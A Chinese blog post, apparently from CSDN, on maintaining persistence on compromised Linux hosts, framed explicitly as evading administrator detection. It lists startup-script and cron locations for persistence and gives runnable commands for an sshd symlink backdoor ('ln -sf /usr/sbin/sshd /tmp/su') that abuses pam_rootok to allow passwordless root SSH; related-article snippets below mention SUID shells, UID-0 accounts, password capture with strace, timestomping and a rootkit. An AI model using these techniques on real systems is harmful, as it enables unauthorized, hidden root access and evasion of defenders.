Linux权限维持

最新推荐文章于 2024-04-02 17:12:52 发布
最新推荐文章于 2024-04-02 17:12:52 发布
阅读量353 收藏
点赞数
分类专栏: # 渗透 文章标签: linux 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/duan_qiao925/article/details/118052461
版权

Linux权限维持与Windows权限维持一样,根本目的都是为了躲避管理员检测。

启动项和计划任务

常用方法如下:

  1. 通过修改“/etc/rc.local”来添加启动命令
  2. 将需要开机执行的脚本放置在“/etc/profile.d/”下,可实现开机启动。
  3. 将启动脚本链接到“/etc/rc.d/rc[0~6].d/”这几个目录下,0~6代表启动级别,0代表停止,1代表单用户模式,2~5代表多用户模式,6代表重启。
  4. 修改“/etc/crontab”文件添加定时执行的程序或脚本。
  5. 将启动脚本放置到“/etc/cron.hourly”、“/etc/cron.daily”、“/etc/cron.weekly”或“/etc/cron.monthly”等周期性执行脚本的目录会定时启动。
sshd软连接

"pam_rootok.so”模块的功能是若用户UID是0,则返回成功,当“/etc/pam.d/ssh”文件配置了“auth sufficient pam_rootok.so”时可以不需要密码登录。
当在被控制端执行命令“ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1234”建立sshd的软连接后门,PAM认证时会根据软连接的名字到“/etc/pam.d”目录寻找对应到PAM认证文件,由于软连接的文件名为“su”,所以SSH的认证文件就被替换成了“/etc/pam.d/ su”,而“su”中默认配置了“auth sufficient pam_rootok.so”,从而导致SSH可以不需要密码登录。
操作过程:
cat/etc/ssh/sshd_config | grep UsePAM #查看是否开启了PAM认证
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1234 #建立sshd软连接后门
ssh root:1111@192.168.220.131 1234 #远程登录
补充:
可能做完这些是无法远程登录root的,原因主要有两个,一是linux在/etc/ssh/sshd_config中限制了root用户远程登录,再者就是系统防火墙策略阻挡。

ddryj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux权限维持.pdf
03-31
linux权限维持.pdf
【内网安全】——Linux权限维持
Demo不是emo的博客
02-26 4494
Linux常见的权限维持姿势
linux权限维持
qq_44704184的博客
07-08 2122
linux权限维持
Linux 权限维持手法
qq_53742230的博客
07-21 2072
Linux 权限维持手法
LINUX权限维持
m0_65096687的博客
06-24 632
添加超级用户的方式有很多种,这里直接拿到root权限后创建一个用户,在/etc/passwd/中修改用户id值为0。Linux提权操作中有个suid提权。在对方主机中查看是否又以下文件·第一个星号是分钟,这里没有加就是过一会就执行。得到对方主机权限后,在目录中写入命令执行脚本。然后就可以利用suid提权来权限维持。拿到对方的root权限后,关闭防火墙。把这些文件加上SUID。然后攻击机开启nc监听。然后在计划任务中配置。
[总结]Linux权限维持1
08-03
1.[总结]SQL注总结 3.[后渗透]多姿势绕过 Powershell 调保护 5.[总结]加载 DLL 的多种式 7.[逆向]PE件格式解析 3. [WEB
linux suid权限维持速查表1
08-03
这篇速查表主要列举了多种利用SUID权限维持的方法,这些方法大多涉及通过不同的命令或者脚本启动一个shell,以获得root权限。以下是一些示例: 1. `chmod u+s program`: 这个命令将SUID权限赋予名为`program`的文件...
linux源码分析
10-11
### Linux源码分析——安全与防御视角 #### 一、概述 Linux作为一款开源操作系统,因其高度的灵活性和稳定性而受到广泛欢迎。然而,这也使其成为黑客和...此外,定期备份和更新系统也是维持系统安全的关键措施之一。
应急响应实战笔记——权限维持篇:④ Linux权限维持&后门篇
最新发布
君逍遥o
04-02 1171
首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候,正则匹配会失败,于是执行下一句,启动/usr/bin/sshd,这是原始sshd。这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到脚本了。它通过提供一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。如果匹配成功就可以登录了。
Linux权限维持(六)
pingan233的博客
02-25 304
# “2”在linux中代表错误输出,“1”在linux中代表标准输出,在此处也就是nohup的输出。#mount --bind命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个目录的访问,并且会将前一个目录路径隐藏起来(注意这里只是隐藏不是删除,数据未发生改变,仅仅是无法访问了)。一般来说我们是做一个正向连接后门,因为反向后门的代码里面没有循环,并不能进行长时间的连接。其中,恶意脚本 dir.py 的内容可以是任何功能的后门,比如上面的监听本地11端口。
Linux系统权限维持
m0_56109788的博客
11-08 80
如果蓝队根据文件修改时间来判断文件是否为后门,如参考index.php的时间再来看shell.php的时间就可以判断shell.php的生成时间有问题解决方法:touch -r index.php shell.php#将文件shell.php的时间修改为和index.php相同,如果shell.php文件不存在,就创建shell.php文件touch命令用于修改文件或目录的时间属性,包括存取时间和更改时间。若文件不存在,系统会建立一个新的文件。
Linux权限维持方法论
大河之犬的博客
06-19 587
Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆,特点是配置简单并可以自定义验证密码和端口号。通过命令替换动态跟踪系统调用和数据,可以用来记录用户ssh、su、sudo的操作。strace不只是可以监听连接他人,还可以用来抓到别人连入的密码。此时我们任何使用ssh登录或者切换用户的操作,密码都会被记录到。文件中,这种方法的缺点是生成的log文件特别大,且容易引起怀疑。其中111111为你连接后门程序时的密码,7777为连接的端口。会获取一个root的shell。
持久化:Linux利用SUID、任务计划、vim进行权限维持
qq_68163788的博客
02-17 1128
以利用SUID(Set User ID)权限来实现权限维持。通过设置SUID权限,用户可以以文件所有者的身份执行该文件,从而获取文件所有者的权限。这样可以帮助攻击者在系统中保持持久权限。另外,任务计划(Cron Jobs)也是一种常见的权限维持方法。攻击者可以通过创建定时任务,定期执行恶意脚本或程序来维持权限。此外,vim编辑器也可以被用来进行权限维持。攻击者可以利用vim编辑器的漏洞来提升自己的权限或执行恶意代码。
Linux权限维持有哪些方法
04-29
Linux权限维持的方法有很多,其中一些常见的方法包括: 1. 提权攻击:攻击者利用系统中存在的漏洞获取root权限。 2. 密码猜测:攻击者通过猜测密码来获取用户的权限。 3. 社会工程学攻击:攻击者通过欺骗用户来获取用户的权限,例如伪装成管理员向用户索取密码或其他敏感信息。 4. 后门攻击:攻击者在系统中植入后门程序,以便在以后可以随时获取权限。 5. 特权提升攻击:攻击者利用系统中的漏洞或配置错误,将自己的权限提升到更高的级别。 为了防止权限维持攻击,可以采取以下措施: 1. 及时升级系统和软件,修补漏洞。 2. 确保所有用户和管理员都使用强密码,并定期更换密码。 3. 加强身份验证和授权控制。 4. 使用安全的文件权限和访问控制策略。 5. 定期审查系统日志,以便及时发现异常行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值